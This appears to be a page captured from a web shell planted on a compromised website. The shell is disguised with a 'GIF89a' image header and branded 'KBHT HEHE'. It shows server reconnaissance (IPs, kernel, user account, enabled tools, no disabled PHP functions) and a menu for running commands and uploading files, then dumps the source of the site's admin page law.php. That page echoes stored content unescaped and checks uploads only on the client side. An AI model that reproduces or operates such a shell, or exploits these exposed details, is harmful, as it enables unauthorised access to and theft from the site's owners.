GIF89a; CRX
KBHT HEHE
Server IP : 172.26.0.195  /  Your IP : 3.138.181.90
Web Server : Apache
System : Linux 43-205-77-33.cprapid.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64
User : jnclnmuac ( 1026)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/jnclnmuac/public_html/web/../jnclnmu/admin/images/../

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/jnclnmuac/public_html/web/../jnclnmu/admin/images/../law.php
<?php include 'headerck.php';?>

	<div class="page-header page-header-light">
		<div class="breadcrumb-line breadcrumb-line-light header-elements-md-inline">
			<div class="d-flex">
				<div class="breadcrumb">
					<a href="#" class="breadcrumb-item"><i class="icon-stack"></i>Manage Department</a>
					<span class="breadcrumb-item active">Department</span>
				</div>
				<a href="#" class="header-elements-toggle text-default d-md-none"><i class="icon-more"></i></a>
			</div>
		</div>
	</div>
	<!-- /page header -->

			<?php
            include("connection.php");
            $sql="select * from tbl_dep where flag='law'";
            
            $query_run=mysqli_query($dbCon, $sql);
            $result=mysqli_num_rows($query_run);
            if($result>0)
            {
                while($row=mysqli_fetch_array($query_run))
                {?>
                    <form action="all.php" method="POST">
                    <textarea name="editor" id="editor" cols="30" rows="10">
                    
                    <?php echo $row['p_msg'] ?>
                    </textarea><br>
                        <input type="submit" name="law_update" value="Update Content" class="btn-success">
                    </form>
                <?php
                }
            }
			
        //}
    ?><br>
	
	<form action="all.php" method="POST" enctype="multipart/form-data">		
		Upload photo: (File Should Be in .jpg/.gif/.png Format)<input type="file" name="pimg" onChange="validextension1(this);"> <input type="submit" name="law_update_img" value="Update Image" class="btn-success">
	</form>

	<?php include 'footerck.php';?>

KBHT - 2023